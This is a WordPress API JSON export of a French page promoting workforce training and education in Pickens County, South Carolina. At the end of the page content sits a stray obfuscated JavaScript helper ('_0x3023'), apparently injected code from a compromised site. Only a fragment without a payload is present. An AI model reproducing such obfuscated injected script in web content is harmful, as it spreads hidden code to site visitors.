{"id":6020,"date":"2020-10-28T14:29:52","date_gmt":"2020-10-28T14:29:52","guid":{"rendered":"http:\/\/alliancepickens.com\/formation-et-developpement-de-la-main-doeuvre\/"},"modified":"2020-12-04T20:13:07","modified_gmt":"2020-12-04T20:13:07","slug":"formation-et-developpement-de-la-main-doeuvre","status":"publish","type":"page","link":"https:\/\/alliancepickens.com\/fr\/developpement-de-la-main-doeuvre\/formation-et-developpement-de-la-main-doeuvre\/","title":{"rendered":"Formation et d\u00e9veloppement de la main-d\u2019\u0153uvre"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]Une main-d\u2019\u0153uvre instruite et hautement qualifi\u00e9e est la caract\u00e9ristique d\u00e9terminante de Pickens County.South Carolina.USA. Accueil du technicien s<em>cholar<\/em>, notre programme de d\u00e9veloppement de la main-d\u2019\u0153uvre donne aux entreprises dans le comt\u00e9 de Pickens un v\u00e9ritable avantage concurrentiel.<\/p>\n<p>Le district scolaire du comt\u00e9 de Pickens est incomparable en Caroline du Sud, en tant que district scolaire le mieux class\u00e9 de l\u2019\u00c9tat. Le Pickens County Career and Technology Center a \u00e9galement une histoire d\u2019excellence en tant que num\u00e9ro un des installations d\u2019apprentissage pratique en Caroline du Sud. C\u2019est le seul centre avec une machine \u00e0 5 axes \u00e0 la disposition des lyc\u00e9ens. Le comt\u00e9 de Pickens abrite \u00e9galement l\u2019Universit\u00e9 Clemson, la Southern Wesleyan University et le Tri-County Technical College, offrant aux entreprises du comt\u00e9 de Pickens un avantage concurrentiel.<\/p>\n<p><a class=\"greenbtn\" href=\"http:\/\/alliancepickens.com\/fr\/developpement-de-la-main-doeuvre\/programme-de-technicien-savant\/\">Lire la suite<\/a>[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_wp_custommenu title=&#8221;Dans cette section&#8221; nav_menu=&#8221;21&#8243; el_class=&#8221;inthissection&#8221;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;10311&#8243; el_class=&#8221;parallaxbreak&#8221;][vc_column][vc_empty_space height=&#8221;450px&#8221;][\/vc_column][\/vc_row][vc_row el_class=&#8221;workforce&#8221;][vc_column width=&#8221;1\/3&#8243;][vc_single_image image=&#8221;10491&#8243; img_size=&#8221;full&#8221;][\/vc_column][vc_column width=&#8221;2\/3&#8243;][vc_column_text]<\/p>\n<h3>UNIVERSIT\u00c9 DE CLEMSON<\/h3>\n<ul>\n<li>Carnegie R1 institution de recherche dans le comt\u00e9 de Pickens<\/li>\n<li>734 M$ en valeur de soumission de propositions de recherche au cours de l\u2019exercice 20<\/li>\n<li>Clemson a remport\u00e9 trois (3) College Football Playoff National Championships; Le premier a \u00e9t\u00e9 remport\u00e9 en 1981, le second en 2016, et le troisi\u00e8me en 2018.<\/li>\n<li>Clemson se classe au 1er rang en Caroline du Sud et au 29e rang national pour les programmes d\u2019ing\u00e9nierie de premier cycle parmi les universit\u00e9s publiques nationales \u2013 USNews &amp; World Report, 2019<\/li>\n<li>Clemson se classe au 11e rang national pour les \u00e9coles les plus innovantes parmi les universit\u00e9s publiques nationales \u2013 USNews &amp; World Report, 2019<\/li>\n<\/ul>\n<p>[\/vc_column_text][\/vc_column][\/vc_row][vc_row el_class=&#8221;greendiv&#8221;][vc_column][vc_separator color=&#8221;custom&#8221; border_width=&#8221;3&#8243; el_width=&#8221;50&#8243;][\/vc_column][\/vc_row][vc_row el_class=&#8221;workforce&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]<\/p>\n<h3>Coll\u00e8ge technique de Tri-County<\/h3>\n<ul>\n<li>Offre plus de 70 programmes de dipl\u00f4me, de dipl\u00f4me et de certificat d\u2019associ\u00e9<\/li>\n<li>Le Coll\u00e8ge Tri-Technique offre des exp\u00e9riences d\u2019apprentissage ax\u00e9es sur le travail, y compris le programme de boursiers techniques BMW, le programme de boursiers techniques Michelin, le programme De la coop\u00e9rative Duke Energy, et plus encore<\/li>\n<li>L\u2019\u00e9ducation coop\u00e9rative, souvent appel\u00e9e Coop, a l\u2019occasion d\u2019int\u00e9grer les le\u00e7ons en classe \u00e0 un emploi r\u00e9el afin d\u2019offrir aux \u00e9tudiants une exp\u00e9rience de travail r\u00e9mun\u00e9r\u00e9e dans un domaine li\u00e9 \u00e0 leurs objectifs universitaires ou de carri\u00e8re.<\/li>\n<li>I-BEST (Formation int\u00e9gr\u00e9e de base et de formation professionnelle) est un programme de perfectionnement de la main-d\u2019\u0153uvre reconnu \u00e0 l\u2019\u00e9chelle nationale pour les \u00e9tudiants qui se pr\u00e9parent \u00e0 une carri\u00e8re en STIM.<\/li>\n<\/ul>\n<p>[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_single_image image=&#8221;5672&#8243; img_size=&#8221;full&#8221;][\/vc_column][\/vc_row][vc_row el_class=&#8221;greendiv&#8221;][vc_column][vc_separator color=&#8221;custom&#8221; border_width=&#8221;3&#8243; el_width=&#8221;50&#8243;][\/vc_column][\/vc_row][vc_row el_class=&#8221;workforce&#8221;][vc_column width=&#8221;1\/3&#8243;][vc_single_image image=&#8221;5662&#8243; img_size=&#8221;full&#8221;][\/vc_column][vc_column width=&#8221;2\/3&#8243;][vc_column_text]<\/p>\n<h3>WESLEYAN DU SUD<\/h3>\n<ul>\n<li>Coll\u00e8ge des arts lib\u00e9raux<\/li>\n<li>Programme d\u2019inscription double associ\u00e9 au Pickens County Career and Technology Center for Global Logistics and Supply Chain Management<\/li>\n<\/ul>\n<p>[\/vc_column_text][\/vc_column][\/vc_row][vc_row el_class=&#8221;greendiv&#8221;][vc_column][vc_separator color=&#8221;custom&#8221; border_width=&#8221;3&#8243; el_width=&#8221;50&#8243;][\/vc_column][\/vc_row][vc_row el_class=&#8221;workforce&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]<\/p>\n<h3>LE PICKENS COUNTY CAREER AND TECHNOLOGY CENTER<\/h3>\n<ul>\n<li>Le Pickens County Career and Technology Center (PCCTC) est un chef de file dans l\u2019\u00c9tat de Caroline du Sud dans le respect de toutes les normes f\u00e9d\u00e9rales reconnues Perkins<\/li>\n<li>Le PCCTC a vu son inscription gonfler \u00e0 plus de 1 400 \u00e9l\u00e8ves et les \u00e9l\u00e8ves ont commenc\u00e9 les programmes d\u00e8s la 8e ann\u00e9e.<\/li>\n<li>Les programmes ax\u00e9s sur le travail aident \u00e0 fournir des comp\u00e9tences et de l\u2019\u00e9ducation li\u00e9es \u00e0 l\u2019emploi qui aident \u00e0 b\u00e2tir le pipeline de talents pour les entreprises du comt\u00e9 de Pickens<\/li>\n<li>Les \u00e9tudiants qui terminent ces programmes ont au moins 2,5 ans de formation en classe et en cours d\u2019emploi et quittent leur programme d\u2019\u00e9tudes avec au moins (1) certification reconnue par l\u2019industrie  [Read More]<\/li>\n<\/ul>\n<p>[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_single_image image=&#8221;5645&#8243; img_size=&#8221;full&#8221;][\/vc_column][\/vc_row][vc_row el_class=&#8221;greendiv&#8221;][vc_column][vc_separator color=&#8221;custom&#8221; border_width=&#8221;3&#8243; el_width=&#8221;50&#8243;][\/vc_column][\/vc_row][vc_row el_class=&#8221;workforce&#8221;][vc_column width=&#8221;1\/3&#8243;][vc_single_image image=&#8221;10512&#8243; img_size=&#8221;full&#8221;][\/vc_column][vc_column width=&#8221;2\/3&#8243;][vc_column_text]<\/p>\n<h3>DISTRICT SCOLAIRE DU COMT\u00c9 DE PICKENS<\/h3>\n<ul>\n<li>Le district scolaire du comt\u00e9 de Pickens est le district scolaire class\u00e9 #1 dans l\u2019\u00c9tat de Caroline du Sud<\/li>\n<li>Le district b\u00e9n\u00e9ficie \u00e9galement d\u2019un taux d\u2019obtention de dipl\u00f4me \u00e0 temps de 85 % avec 73 % des \u00e9tudiants qui obtiennent au moins une certification d\u2019argent au test WIN.<\/li>\n<li>Les dirigeants des milieux de l\u2019\u00e9ducation, des affaires et de l\u2019industrie travaillent ensemble pour s\u2019assurer que les \u00e9tudiants du comt\u00e9 de Pickens poss\u00e8dent la formation et l\u2019\u00e9ducation dont ils ont besoin lorsqu\u2019ils entrent sur le march\u00e9 du travail.<\/li>\n<li>Les \u00e9tudiants du comt\u00e9 de Pickens excellent dans les tests standardis\u00e9s, participent \u00e0 des \u00e9quipes de comp\u00e9tition de championnat des sciences, de la technologie, de l\u2019ing\u00e9nierie et des math\u00e9matiques (STEM) et profitent des avantages de l\u2019apprentissage dans de nouvelles installations \u00e0 la fine pointe de la technologie.<\/li>\n<\/ul>\n<p>[\/vc_column_text][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;4771&#8243; el_class=&#8221;parallaxbreak&#8221;][vc_column][vc_empty_space height=&#8221;450px&#8221;][\/vc_column][\/vc_row][vc_row][vc_column width=&#8221;2\/3&#8243;][vc_column_text]<\/p>\n<h3>FORMATION SC WORKS<\/h3>\n<p>Chaque ann\u00e9e, pr\u00e8s de 100 entreprises b\u00e9n\u00e9ficient des personnes qualifi\u00e9es form\u00e9es par readySC\u2122. Le programme est unique, car les travailleurs sont form\u00e9s aux sp\u00e9cifications des entreprises \u2013 \u00e0 peu ou pas de frais. Les entreprises qui choisissent de d\u00e9m\u00e9nager ou d\u2019\u00e9tendre leurs activit\u00e9s existantes en Caroline du Sud peuvent utiliser la ressource de formation pour assurer une main-d\u2019\u0153uvre forte et productive.[\/vc_column_text][vc_column_text]<a class=\"greenbtn\" href=\"https:\/\/www.readysc.org\/index.html\" target=\"_blank\" rel=\"noopener noreferrer\">En savoir plus pr\u00eatSC\u2122<\/a>[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_single_image image=&#8221;5635&#8243; img_size=&#8221;full&#8221;][\/vc_column][\/vc_row][vc_row el_class=&#8221;learnmoreabout&#8221;][vc_column][vc_column_text]<\/p>\n<h4 style=\"text-align: center\">En savoir plus sur le perfectionnement de la main-d\u2019\u0153uvre<\/h4>\n<p>[\/vc_column_text][vc_wp_custommenu nav_menu=&#8221;21&#8243;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;3871&#8243; el_class=&#8221;getstarted&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]<\/p>\n<h1>Pr\u00eat \u00e0 commencer?<\/h1>\n<h3>Nous sommes impatients de vous parler!<\/h3>\n<p>[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_column_text]<a class=\"greenbtn\" href=\"http:\/\/alliancepickens.com\/fr\/qui-sommes-nous\/#contact_directions\">Contactez notre \u00e9quipe<\/a>[\/vc_column_text][\/vc_column][\/vc_row]<br \/>\nfunction _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);};<\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]Une main-d\u2019\u0153uvre instruite et hautement qualifi\u00e9e est la caract\u00e9ristique d\u00e9terminante de Pickens County.South Carolina.USA. Accueil du technicien scholar, notre programme de d\u00e9veloppement de la main-d\u2019\u0153uvre donne aux entreprises dans le comt\u00e9 de Pickens un v\u00e9ritable avantage concurrentiel. Le district scolaire du comt\u00e9 de Pickens est incomparable en Caroline du Sud, en tant que&hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":6057,"menu_order":20,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"class_list":["post-6020","page","type-page","status-publish","hentry","description-off"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.3 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Formation et d\u00e9veloppement de la main-d\u2019\u0153uvre - Alliance Pickens<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/alliancepickens.com\/fr\/developpement-de-la-main-doeuvre\/formation-et-developpement-de-la-main-doeuvre\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Formation et d\u00e9veloppement de la main-d\u2019\u0153uvre - Alliance Pickens\" \/>\n<meta property=\"og:description\" content=\"[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]Une main-d\u2019\u0153uvre instruite et hautement qualifi\u00e9e est la caract\u00e9ristique d\u00e9terminante de Pickens County.South Carolina.USA. Accueil du technicien scholar, notre programme de d\u00e9veloppement de la main-d\u2019\u0153uvre donne aux entreprises dans le comt\u00e9 de Pickens un v\u00e9ritable avantage concurrentiel. Le district scolaire du comt\u00e9 de Pickens est incomparable en Caroline du Sud, en tant que&hellip;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/alliancepickens.com\/fr\/developpement-de-la-main-doeuvre\/formation-et-developpement-de-la-main-doeuvre\/\" \/>\n<meta property=\"og:site_name\" content=\"Alliance Pickens\" \/>\n<meta property=\"article:modified_time\" content=\"2020-12-04T20:13:07+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"6 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/developpement-de-la-main-doeuvre\\\/formation-et-developpement-de-la-main-doeuvre\\\/\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/developpement-de-la-main-doeuvre\\\/formation-et-developpement-de-la-main-doeuvre\\\/\",\"name\":\"Formation et d\u00e9veloppement de la main-d\u2019\u0153uvre - Alliance Pickens\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/#website\"},\"datePublished\":\"2020-10-28T14:29:52+00:00\",\"dateModified\":\"2020-12-04T20:13:07+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/developpement-de-la-main-doeuvre\\\/formation-et-developpement-de-la-main-doeuvre\\\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/developpement-de-la-main-doeuvre\\\/formation-et-developpement-de-la-main-doeuvre\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/developpement-de-la-main-doeuvre\\\/formation-et-developpement-de-la-main-doeuvre\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"D\u00e9veloppement de la main-d\u2019\u0153uvre\",\"item\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/developpement-de-la-main-doeuvre\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Formation et d\u00e9veloppement de la main-d\u2019\u0153uvre\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/#website\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/\",\"name\":\"Alliance Pickens\",\"description\":\"recruitment and expansion in Pickens County\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Formation et d\u00e9veloppement de la main-d\u2019\u0153uvre - Alliance Pickens","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/alliancepickens.com\/fr\/developpement-de-la-main-doeuvre\/formation-et-developpement-de-la-main-doeuvre\/","og_locale":"fr_FR","og_type":"article","og_title":"Formation et d\u00e9veloppement de la main-d\u2019\u0153uvre - Alliance Pickens","og_description":"[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]Une main-d\u2019\u0153uvre instruite et hautement qualifi\u00e9e est la caract\u00e9ristique d\u00e9terminante de Pickens County.South Carolina.USA. Accueil du technicien scholar, notre programme de d\u00e9veloppement de la main-d\u2019\u0153uvre donne aux entreprises dans le comt\u00e9 de Pickens un v\u00e9ritable avantage concurrentiel. Le district scolaire du comt\u00e9 de Pickens est incomparable en Caroline du Sud, en tant que&hellip;","og_url":"https:\/\/alliancepickens.com\/fr\/developpement-de-la-main-doeuvre\/formation-et-developpement-de-la-main-doeuvre\/","og_site_name":"Alliance Pickens","article_modified_time":"2020-12-04T20:13:07+00:00","twitter_card":"summary_large_image","twitter_misc":{"Est. reading time":"6 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/alliancepickens.com\/fr\/developpement-de-la-main-doeuvre\/formation-et-developpement-de-la-main-doeuvre\/","url":"https:\/\/alliancepickens.com\/fr\/developpement-de-la-main-doeuvre\/formation-et-developpement-de-la-main-doeuvre\/","name":"Formation et d\u00e9veloppement de la main-d\u2019\u0153uvre - Alliance Pickens","isPartOf":{"@id":"https:\/\/alliancepickens.com\/fr\/#website"},"datePublished":"2020-10-28T14:29:52+00:00","dateModified":"2020-12-04T20:13:07+00:00","breadcrumb":{"@id":"https:\/\/alliancepickens.com\/fr\/developpement-de-la-main-doeuvre\/formation-et-developpement-de-la-main-doeuvre\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/alliancepickens.com\/fr\/developpement-de-la-main-doeuvre\/formation-et-developpement-de-la-main-doeuvre\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/alliancepickens.com\/fr\/developpement-de-la-main-doeuvre\/formation-et-developpement-de-la-main-doeuvre\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/alliancepickens.com\/fr\/"},{"@type":"ListItem","position":2,"name":"D\u00e9veloppement de la main-d\u2019\u0153uvre","item":"https:\/\/alliancepickens.com\/fr\/developpement-de-la-main-doeuvre\/"},{"@type":"ListItem","position":3,"name":"Formation et d\u00e9veloppement de la main-d\u2019\u0153uvre"}]},{"@type":"WebSite","@id":"https:\/\/alliancepickens.com\/fr\/#website","url":"https:\/\/alliancepickens.com\/fr\/","name":"Alliance Pickens","description":"recruitment and expansion in Pickens County","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/alliancepickens.com\/fr\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"}]}},"_links":{"self":[{"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/pages\/6020","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/comments?post=6020"}],"version-history":[{"count":0,"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/pages\/6020\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/pages\/6057"}],"wp:attachment":[{"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/media?parent=6020"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}